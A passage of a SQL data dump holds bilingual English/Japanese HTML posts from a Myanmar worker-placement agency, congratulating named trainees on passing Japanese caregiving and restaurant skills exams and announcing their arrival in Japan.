data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f769e4fc3aaf4cc3db7cf1af06d2affb453c0e8fa62c1da77eaeedd423f04c5d_8db4df3a5dafd163.jpg\" data-entity-uuid=\"cbbb45ad-3cd3-47da-baf4-de3bd1d85cdb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 120, 539, 'en', 0, '<blockquote><h2><strong>Boss\'s Treatment To Celebrate For The Interview Passed Student</strong></h2></blockquote><p><strong>Throughout this journey,You have been an unwavering source of encouragement and mentorship. Their belief in my potential and their invaluable advice truly made a difference in preparing for this milestone. Their leadership style fosters a positive work environment where everyone feels valued and motivated to excel.</strong></p><img src=\"/sites/default/files/inline-images/0-02-01-0c2d7cbb85052b32b9b9b2141188d6e1264592cb9faba90cdfa7b0e0e275254e_9cddaf25319c70b4.jpg\" data-entity-uuid=\"42450864-8900-4ee5-be49-71951d8e2707\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1cb7f08548b9d8875b398fe974de7151e7cbfecfaaa3d5dc8afae9506e04b128_2b42e2d39d912d33.jpg\" data-entity-uuid=\"e5c60c22-aef1-424a-8da8-915020a115fd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3fa8e6b76d10c2bb84085b9bd26037db29c49e63c2a213c93f994b833011928c_81a2606370e44bd4.jpg\" data-entity-uuid=\"025f50cd-5493-4bf2-b158-db18e54ee88c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4a68eaf2f2d17fae998a4249ad95aaaa856dd15ac9cea87a656439435bfa30c5_14deb95b28de4a03.jpg\" data-entity-uuid=\"da2f7e63-9559-44f1-906d-064bff7a87f6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-5d08eb28957488839cc9aa8d7f7fe410121efaeef650a1ece11d1624edbf086a_6aa711044fae7b6.jpg\" data-entity-uuid=\"7c4a740a-721c-49d7-93a1-6013c1acb046\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-07e7cccf7254751c6a31aeb7b5fab42bafcc09a41eb88ea492da6b5ec9fd6c91_c74e759ca6c36d5c.jpg\" data-entity-uuid=\"9a63bcca-1e29-4082-b750-4fb7c1a4c2e9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7c02ffb9fc9024e520739948a987a9379e63cde74b0503b60c1ae3db3a89c147_55e2a9cff905b5bd.jpg\" data-entity-uuid=\"c34a5086-3042-437f-a14a-4b8bc1438549\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7ca2fd520735f2908ba21f9317c1b3f17a1ec4dd3794d056b4bebaead0e150a4_e76da50ac6e7da9.jpg\" data-entity-uuid=\"dfb440a7-6a47-49b6-acfb-39c4ea9d2824\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-055e37e956795c43bdd466a2a68b13ffb5aa6c26753424e9aee80253b2c85e96_66723606b1d13e7.jpg\" data-entity-uuid=\"63621b4e-69c9-428e-8d0e-288e59125e5d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-385acaa9bb806597960e6134f46b0b1100c10b2ec8d3f397d9b19b54a6f9e283_afe2b35c0e23caaa.jpg\" data-entity-uuid=\"c66ab6d9-dfff-44c5-82a5-1a400c211ecd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-518eef8eec7ba3ee0e2fc7d22da0209264265c487f3a783ce53086d68f960490_49e213809bc69b92.jpg\" data-entity-uuid=\"9fa86d3b-367b-47be-8c91-d97eb232f00c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3267c907a9213396559285ef2ff89589bea6feebc159bfae8c7afc8def669184_1532713942463601.jpg\" data-entity-uuid=\"182c1c4c-26bb-48f8-931c-2b27ba7d5995\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-477997d7024f7f23a3fc29753410617339ae86d8cf927182823774a2c386e32a_5aec6dc626b86c37.jpg\" data-entity-uuid=\"355ae490-43b3-4113-aa09-df893e415b99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d1cc1a642e8e8ecacf94405bdafc0147a61a06d7f25083687a2905ec3bac39b2_b7bb05875990f417.jpg\" data-entity-uuid=\"cca2db21-e1a5-44d0-877e-6688a0f2b994\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dafe162cb611aaa55a5cd57f7abf5d59d0d21130dd5723e21589e98479ce51d1_aab1a82c80d13523.jpg\" data-entity-uuid=\"bc2507ab-a130-434e-91d8-cf2722c501fa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dc06d8870e524430ccb6d0f7b9e080b732456328b77873cb14b9bac6131853d0_3ce7fa2e748d1400.jpg\" data-entity-uuid=\"da7c42e2-128e-4556-8597-ad3b1c415a28\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f769e4fc3aaf4cc3db7cf1af06d2affb453c0e8fa62c1da77eaeedd423f04c5d_8db4df3a5dafd163.jpg\" data-entity-uuid=\"cbbb45ad-3cd3-47da-baf4-de3bd1d85cdb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 120, 539, 'ja', 0, '<blockquote><h2>面接合格を祝う上司の待遇</h2><p>この旅を通して、あなたは揺るぎない励ましと指導の源でした。私の可能性を信じてくださり、貴重なアドバイスをしてくださったおかげで、この節目を迎える準備ができました。彼らのリーダーシップ・スタイルは、誰もが評価され、卓越したモチベーションを感じられる前向きな職場環境を育んでいます。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-0c2d7cbb85052b32b9b9b2141188d6e1264592cb9faba90cdfa7b0e0e275254e_9cddaf25319c70b4.jpg\" data-entity-uuid=\"42450864-8900-4ee5-be49-71951d8e2707\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1cb7f08548b9d8875b398fe974de7151e7cbfecfaaa3d5dc8afae9506e04b128_2b42e2d39d912d33.jpg\" data-entity-uuid=\"e5c60c22-aef1-424a-8da8-915020a115fd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3fa8e6b76d10c2bb84085b9bd26037db29c49e63c2a213c93f994b833011928c_81a2606370e44bd4.jpg\" data-entity-uuid=\"025f50cd-5493-4bf2-b158-db18e54ee88c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4a68eaf2f2d17fae998a4249ad95aaaa856dd15ac9cea87a656439435bfa30c5_14deb95b28de4a03.jpg\" data-entity-uuid=\"da2f7e63-9559-44f1-906d-064bff7a87f6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-5d08eb28957488839cc9aa8d7f7fe410121efaeef650a1ece11d1624edbf086a_6aa711044fae7b6.jpg\" data-entity-uuid=\"7c4a740a-721c-49d7-93a1-6013c1acb046\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-07e7cccf7254751c6a31aeb7b5fab42bafcc09a41eb88ea492da6b5ec9fd6c91_c74e759ca6c36d5c.jpg\" data-entity-uuid=\"9a63bcca-1e29-4082-b750-4fb7c1a4c2e9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7c02ffb9fc9024e520739948a987a9379e63cde74b0503b60c1ae3db3a89c147_55e2a9cff905b5bd.jpg\" data-entity-uuid=\"c34a5086-3042-437f-a14a-4b8bc1438549\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7ca2fd520735f2908ba21f9317c1b3f17a1ec4dd3794d056b4bebaead0e150a4_e76da50ac6e7da9.jpg\" data-entity-uuid=\"dfb440a7-6a47-49b6-acfb-39c4ea9d2824\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-055e37e956795c43bdd466a2a68b13ffb5aa6c26753424e9aee80253b2c85e96_66723606b1d13e7.jpg\" data-entity-uuid=\"63621b4e-69c9-428e-8d0e-288e59125e5d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-385acaa9bb806597960e6134f46b0b1100c10b2ec8d3f397d9b19b54a6f9e283_afe2b35c0e23caaa.jpg\" data-entity-uuid=\"c66ab6d9-dfff-44c5-82a5-1a400c211ecd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-518eef8eec7ba3ee0e2fc7d22da0209264265c487f3a783ce53086d68f960490_49e213809bc69b92.jpg\" data-entity-uuid=\"9fa86d3b-367b-47be-8c91-d97eb232f00c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3267c907a9213396559285ef2ff89589bea6feebc159bfae8c7afc8def669184_1532713942463601.jpg\" data-entity-uuid=\"182c1c4c-26bb-48f8-931c-2b27ba7d5995\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-477997d7024f7f23a3fc29753410617339ae86d8cf927182823774a2c386e32a_5aec6dc626b86c37.jpg\" data-entity-uuid=\"355ae490-43b3-4113-aa09-df893e415b99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d1cc1a642e8e8ecacf94405bdafc0147a61a06d7f25083687a2905ec3bac39b2_b7bb05875990f417.jpg\" data-entity-uuid=\"cca2db21-e1a5-44d0-877e-6688a0f2b994\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dafe162cb611aaa55a5cd57f7abf5d59d0d21130dd5723e21589e98479ce51d1_aab1a82c80d13523.jpg\" data-entity-uuid=\"bc2507ab-a130-434e-91d8-cf2722c501fa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dc06d8870e524430ccb6d0f7b9e080b732456328b77873cb14b9bac6131853d0_3ce7fa2e748d1400.jpg\" data-entity-uuid=\"da7c42e2-128e-4556-8597-ad3b1c415a28\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f769e4fc3aaf4cc3db7cf1af06d2affb453c0e8fa62c1da77eaeedd423f04c5d_8db4df3a5dafd163.jpg\" data-entity-uuid=\"cbbb45ad-3cd3-47da-baf4-de3bd1d85cdb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 121, 540, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations YEE YEE THANT &amp; NAY LIN AUNG for passing Kaigo Training Job in JAPAN.&nbsp;</p><img data-entity-uuid=\"608c33ee-1bc6-45be-a69c-4d154cd4b1bc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/nay%20lin%20aung.jpg\"><img data-entity-uuid=\"03c42830-59a9-4b66-8481-82f1913ccf6b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yee%20yee%20thant.jpg\">', '', 'full_html'),
('activities', 0, 121, 541, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations YEE YEE THANT &amp; NAY LIN AUNG for passing Kaigo Training Job in JAPAN.&nbsp;</p><img data-entity-uuid=\"608c33ee-1bc6-45be-a69c-4d154cd4b1bc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/nay%20lin%20aung.jpg\"><img data-entity-uuid=\"03c42830-59a9-4b66-8481-82f1913ccf6b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yee%20yee%20thant.jpg\">', '', 'full_html'),
('activities', 0, 121, 541, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YEE YEE THANT </strong>さんと <strong>NAY LIN AUNG</strong> さんが日本での介護職研修に合格しました、おめでとうございます。</p><img src=\"/sites/default/files/inline-images/nay%20lin%20aung.jpg\" data-entity-uuid=\"608c33ee-1bc6-45be-a69c-4d154cd4b1bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/yee%20yee%20thant.jpg\" data-entity-uuid=\"03c42830-59a9-4b66-8481-82f1913ccf6b\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 122, 542, 'en', 0, '<blockquote><h2>1th Batch Internship in Sushi Resturtant</h2></blockquote><p>Beyond the technical aspects, the internship has also provided insight into Japanese culture and traditions surrounding food. From understanding the significance of fresh, seasonal ingredients to the importance of respect and discipline in the kitchen, every lesson has deepened my admiration for the rich heritage behind sushi cuisine.</p><img src=\"/sites/default/files/inline-images/0-02-01-9f8d22c92e76a81b3af76036f43e0bf8dd32fc0e03738882ea167934d692cf08_8e52a9e48a1897f3.jpg\" data-entity-uuid=\"638fbc43-354c-4a83-8619-86ed53743365\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-40b11a3f4772d17614c9f522ce6f8cc0f64b54dd6e04a045475db49f930a7334_7ec5d1ab150ab3a7.jpg\" data-entity-uuid=\"c2a23cb2-ef07-4577-baab-62bb10050347\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-91f4a6d011d24228e0d94d359bc0917a8ca3b0648f6548629f87053d21707d37_968c66caee131c1f.jpg\" data-entity-uuid=\"11b83da9-69ce-4f72-a7f1-9862d99d75ef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-396e60b1b371cc598c56fec5c3be8d0ab272b2dbcb0f6837255d43b28f745afb_3d4c2aeaabd3f8fb.jpg\" data-entity-uuid=\"e3b6955f-da68-4424-892f-1c1ab4ebf4dd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-aaf6d1694a56063549af1e65fc2adf60c6f354b2c0f98e71862bc49480b9b549_8228be82603b0132.jpg\" data-entity-uuid=\"e5ea1ca6-9e48-45c6-a3fd-51e37a78247e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7f8bf287051628fe542dfe1361779338716dc107a015c5c06be123ded82ffb8_5a47cc0f40065b9f.jpg\" data-entity-uuid=\"a6a2ae23-9364-4049-ae45-17f0b70456fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f2f3d74c6468368650282adcc3ef32f3f4a25f7c434c4b174cbcced600a2ea66_65bfb62c6fc87d06.jpg\" data-entity-uuid=\"771f1d6f-7cae-43b0-bda7-9d3215416018\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-fe3e119dfb082a30adcde1ff897ea5df820f2e40d7286e4f0cd3c9cd4405ea57_b51abf4b4648412b.jpg\" data-entity-uuid=\"3fc47b17-3b12-4996-8ff0-5f424cb156a7\" data-entity-type=\"file\">', '', 'basic_html'),
('activities', 0, 122, 544, 'en', 0, '<blockquote><h2>1th Batch Internship in Sushi Resturtant</h2></blockquote><p>Beyond the technical aspects, the internship has also provided insight into Japanese culture and traditions surrounding food. From understanding the significance of fresh, seasonal ingredients to the importance of respect and discipline in the kitchen, every lesson has deepened my admiration for the rich heritage behind sushi cuisine.</p><img src=\"/sites/default/files/inline-images/0-02-01-9f8d22c92e76a81b3af76036f43e0bf8dd32fc0e03738882ea167934d692cf08_8e52a9e48a1897f3.jpg\" data-entity-uuid=\"638fbc43-354c-4a83-8619-86ed53743365\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-40b11a3f4772d17614c9f522ce6f8cc0f64b54dd6e04a045475db49f930a7334_7ec5d1ab150ab3a7.jpg\" data-entity-uuid=\"c2a23cb2-ef07-4577-baab-62bb10050347\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-91f4a6d011d24228e0d94d359bc0917a8ca3b0648f6548629f87053d21707d37_968c66caee131c1f.jpg\" data-entity-uuid=\"11b83da9-69ce-4f72-a7f1-9862d99d75ef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-396e60b1b371cc598c56fec5c3be8d0ab272b2dbcb0f6837255d43b28f745afb_3d4c2aeaabd3f8fb.jpg\" data-entity-uuid=\"e3b6955f-da68-4424-892f-1c1ab4ebf4dd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-aaf6d1694a56063549af1e65fc2adf60c6f354b2c0f98e71862bc49480b9b549_8228be82603b0132.jpg\" data-entity-uuid=\"e5ea1ca6-9e48-45c6-a3fd-51e37a78247e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7f8bf287051628fe542dfe1361779338716dc107a015c5c06be123ded82ffb8_5a47cc0f40065b9f.jpg\" data-entity-uuid=\"a6a2ae23-9364-4049-ae45-17f0b70456fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f2f3d74c6468368650282adcc3ef32f3f4a25f7c434c4b174cbcced600a2ea66_65bfb62c6fc87d06.jpg\" data-entity-uuid=\"771f1d6f-7cae-43b0-bda7-9d3215416018\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-fe3e119dfb082a30adcde1ff897ea5df820f2e40d7286e4f0cd3c9cd4405ea57_b51abf4b4648412b.jpg\" data-entity-uuid=\"3fc47b17-3b12-4996-8ff0-5f424cb156a7\" data-entity-type=\"file\">', '', 'basic_html'),
('activities', 0, 122, 544, 'ja', 0, '<blockquote><h2>寿司レストランでの1期生インターンシップ</h2><p>このインターンシップでは、技術的な面だけでなく、食を取り巻く日本の文化や伝統についても学ぶことができました。新鮮な旬の食材の重要性を理解することから、厨房における敬意と規律の重要性を理解することまで、すべてのレッスンは、寿司料理の背後にある豊かな伝統に対する私の賞賛を深めました。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-9f8d22c92e76a81b3af76036f43e0bf8dd32fc0e03738882ea167934d692cf08_8e52a9e48a1897f3.jpg\" data-entity-uuid=\"638fbc43-354c-4a83-8619-86ed53743365\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-40b11a3f4772d17614c9f522ce6f8cc0f64b54dd6e04a045475db49f930a7334_7ec5d1ab150ab3a7.jpg\" data-entity-uuid=\"c2a23cb2-ef07-4577-baab-62bb10050347\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-91f4a6d011d24228e0d94d359bc0917a8ca3b0648f6548629f87053d21707d37_968c66caee131c1f.jpg\" data-entity-uuid=\"11b83da9-69ce-4f72-a7f1-9862d99d75ef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-396e60b1b371cc598c56fec5c3be8d0ab272b2dbcb0f6837255d43b28f745afb_3d4c2aeaabd3f8fb.jpg\" data-entity-uuid=\"e3b6955f-da68-4424-892f-1c1ab4ebf4dd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-aaf6d1694a56063549af1e65fc2adf60c6f354b2c0f98e71862bc49480b9b549_8228be82603b0132.jpg\" data-entity-uuid=\"e5ea1ca6-9e48-45c6-a3fd-51e37a78247e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7f8bf287051628fe542dfe1361779338716dc107a015c5c06be123ded82ffb8_5a47cc0f40065b9f.jpg\" data-entity-uuid=\"a6a2ae23-9364-4049-ae45-17f0b70456fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f2f3d74c6468368650282adcc3ef32f3f4a25f7c434c4b174cbcced600a2ea66_65bfb62c6fc87d06.jpg\" data-entity-uuid=\"771f1d6f-7cae-43b0-bda7-9d3215416018\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-fe3e119dfb082a30adcde1ff897ea5df820f2e40d7286e4f0cd3c9cd4405ea57_b51abf4b4648412b.jpg\" data-entity-uuid=\"3fc47b17-3b12-4996-8ff0-5f424cb156a7\" data-entity-type=\"file\">', '', 'basic_html'),
('activities', 0, 123, 543, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations KHIN YU MON PHYO &amp; THAE EI PHYU for passing TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"11cc8788-a3e8-44aa-adc5-3fa9788ac0ac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khin%20yu%20mon%20phyo.jpg\"><img data-entity-uuid=\"8483420b-9966-4684-85c2-a7c5dc9eec72\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thae%20ei%20phyu.jpg\">', '', 'full_html'),
('activities', 0, 123, 545, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations KHIN YU MON PHYO &amp; THAE EI PHYU for passing TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"11cc8788-a3e8-44aa-adc5-3fa9788ac0ac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khin%20yu%20mon%20phyo.jpg\"><img data-entity-uuid=\"8483420b-9966-4684-85c2-a7c5dc9eec72\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thae%20ei%20phyu.jpg\">', '', 'full_html'),
('activities', 0, 123, 545, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>KHIN YU MON PHYO</strong> さんと <strong>THAE EI PHYU</strong> さんが TOKUTEI GAISHOKU (レストラン) に合格しました。おめでとうございます。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/khin%20yu%20mon%20phyo.jpg\" data-entity-uuid=\"11cc8788-a3e8-44aa-adc5-3fa9788ac0ac\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thae%20ei%20phyu.jpg\" data-entity-uuid=\"8483420b-9966-4684-85c2-a7c5dc9eec72\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 124, 546, 'en', 0, '<blockquote><p>CONGRATULATIONS !&nbsp;</p></blockquote><p>Congratulations for THURA KYAW for passing TOKUTEI GAISHOKU ( restaurant)&nbsp;</p><img data-entity-uuid=\"c14dffcc-f57b-4359-b31d-d7bd20f9884c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thura%20kyaw.jpg\">', '', 'full_html'),
('activities', 0, 124, 547, 'en', 0, '<blockquote><p>CONGRATULATIONS !&nbsp;</p></blockquote><p>Congratulations for THURA KYAW for passing TOKUTEI GAISHOKU ( restaurant)&nbsp;</p><img data-entity-uuid=\"c14dffcc-f57b-4359-b31d-d7bd20f9884c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thura%20kyaw.jpg\">', '', 'full_html'),
('activities', 0, 124, 547, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>THURA KYAW</strong>、特定外食合格おめでとうございます</p><img src=\"/sites/default/files/inline-images/thura%20kyaw.jpg\" data-entity-uuid=\"c14dffcc-f57b-4359-b31d-d7bd20f9884c\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 125, 548, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations MAY THINGYAN HTUN &amp; NAW NAY DAR PAUL for passing the TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img data-entity-uuid=\"a767e823-1818-45b8-bfa5-8e53174e07f4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/may%20thingyan%20htun.jpg\"><img data-entity-uuid=\"883558f9-196f-43ae-bf00-696ab32d1537\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/naw%20nay%20dar%20palu.jpg\">', '', 'full_html'),
('activities', 0, 125, 549, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations MAY THINGYAN HTUN &amp; NAW NAY DAR PAUL for passing the TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img data-entity-uuid=\"a767e823-1818-45b8-bfa5-8e53174e07f4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/may%20thingyan%20htun.jpg\"><img data-entity-uuid=\"883558f9-196f-43ae-bf00-696ab32d1537\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/naw%20nay%20dar%20palu.jpg\">', '', 'full_html'),
('activities', 0, 125, 549, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>MAY THINGYAN HTUN</strong>さんと<strong>NAW NAY DAR PALU </strong>さんが、TOKUTEI GAISHOKU（レストラン）に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/may%20thingyan%20htun.jpg\" data-entity-uuid=\"a767e823-1818-45b8-bfa5-8e53174e07f4\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/naw%20nay%20dar%20palu.jpg\" data-entity-uuid=\"883558f9-196f-43ae-bf00-696ab32d1537\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 126, 550, 'en', 0, '<blockquote><h2>Arrival At Japan(10-4-2024)</h2></blockquote><p>Eight Kaigo children who departed from Myanmar on a Tokutei Visa on April 9, 2024, will arrive in Japan today, April 10, 2024. May you achieve great success in Japan with your new endeavors.</p><img src=\"/sites/default/files/inline-images/0-02-01-9a9113c0ab47d61d6f44e1ab82e21a9d2e224d79ec9a0c8be6282758671e3242_c767f65b91012f29.jpg\" data-entity-uuid=\"4c6202c4-1968-4a65-9fc8-12dcb75586c2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-46ded82e6875be1c575c2c4cf6bd4e5a9ae3a64d36a4dce3bf7fc19f16a4875d_f44ec97cf8b68fba.jpg\" data-entity-uuid=\"2e2e8b8f-d542-4c37-b6c6-8147bb7068dc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7bc7d196b183d6305a85d12a7ffa14f91a9c1f16afd359db093a65d8bf05c9c_1e32546c6fc28083.jpg\" data-entity-uuid=\"f6008a16-5ea7-4f8e-93a7-04cef7dca549\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 126, 551, 'en', 0, '<blockquote><h2>Arrival At Japan(10-4-2024)</h2></blockquote><p>Eight Kaigo children who departed from Myanmar on a Tokutei Visa on April 9, 2024, will arrive in Japan today, April 10, 2024. May you achieve great success in Japan with your new endeavors.</p><img src=\"/sites/default/files/inline-images/0-02-01-9a9113c0ab47d61d6f44e1ab82e21a9d2e224d79ec9a0c8be6282758671e3242_c767f65b91012f29.jpg\" data-entity-uuid=\"4c6202c4-1968-4a65-9fc8-12dcb75586c2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-46ded82e6875be1c575c2c4cf6bd4e5a9ae3a64d36a4dce3bf7fc19f16a4875d_f44ec97cf8b68fba.jpg\" data-entity-uuid=\"2e2e8b8f-d542-4c37-b6c6-8147bb7068dc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7bc7d196b183d6305a85d12a7ffa14f91a9c1f16afd359db093a65d8bf05c9c_1e32546c6fc28083.jpg\" data-entity-uuid=\"f6008a16-5ea7-4f8e-93a7-04cef7dca549\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 126, 551, 'ja', 0, '<blockquote><h2>日本到着(10-4-2024)</h2><p>2024年4月9日にトクテイビザでミャンマーを出発したカイゴの子どもたち8名が、本日2024年4月10日に日本に到着します。日本での新たな活躍が大いに期待されます。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-9a9113c0ab47d61d6f44e1ab82e21a9d2e224d79ec9a0c8be6282758671e3242_c767f65b91012f29.jpg\" data-entity-uuid=\"4c6202c4-1968-4a65-9fc8-12dcb75586c2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-46ded82e6875be1c575c2c4cf6bd4e5a9ae3a64d36a4dce3bf7fc19f16a4875d_f44ec97cf8b68fba.jpg\" data-entity-uuid=\"2e2e8b8f-d542-4c37-b6c6-8147bb7068dc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7bc7d196b183d6305a85d12a7ffa14f91a9c1f16afd359db093a65d8bf05c9c_1e32546c6fc28083.jpg\" data-entity-uuid=\"f6008a16-5ea7-4f8e-93a7-04cef7dca549\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 127, 552, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congrats YU WAI PHYO , SOE SANDAR HTWE, PANN EI ZAW for Tokutei Gaishoku (Restaurant)&nbsp;</p><img data-entity-uuid=\"20ae1406-4043-4478-a49e-742e89470e62\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/pann%20ei%20zaw.jpg\"><img data-entity-uuid=\"f3a2deb2-6f5c-4b32-9597-32e99fb4a8be\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/soe%20sandar%20htwe.jpg\"><img data-entity-uuid=\"42853554-ebd5-4f1d-a743-230c2a126fc4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yu%20wai%20phyo.jpg\">', '', 'full_html'),
('activities', 0, 127, 553, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congrats YU WAI PHYO , SOE SANDAR HTWE, PANN EI ZAW for Tokutei Gaishoku (Restaurant)&nbsp;</p><img data-entity-uuid=\"20ae1406-4043-4478-a49e-742e89470e62\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/pann%20ei%20zaw.jpg\"><img data-entity-uuid=\"f3a2deb2-6f5c-4b32-9597-32e99fb4a8be\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/soe%20sandar%20htwe.jpg\"><img data-entity-uuid=\"42853554-ebd5-4f1d-a743-230c2a126fc4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yu%20wai%20phyo.jpg\">', '', 'full_html'),
